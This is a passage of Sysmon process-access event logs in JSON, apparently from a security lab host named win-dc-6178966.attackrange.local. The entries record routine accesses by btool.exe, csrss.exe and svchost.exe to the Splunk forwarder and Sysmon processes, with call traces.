Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1FF6-5F25-0000-001072830500}","SourceProcessId":"880","SourceThreadId":"672","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-00102D840500}","TargetProcessId":"4916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3534,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-00102D840500}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-00102D840500}","TargetProcessId":"4916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3535,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3536,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3537,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3538,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3539,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3540,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3541,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
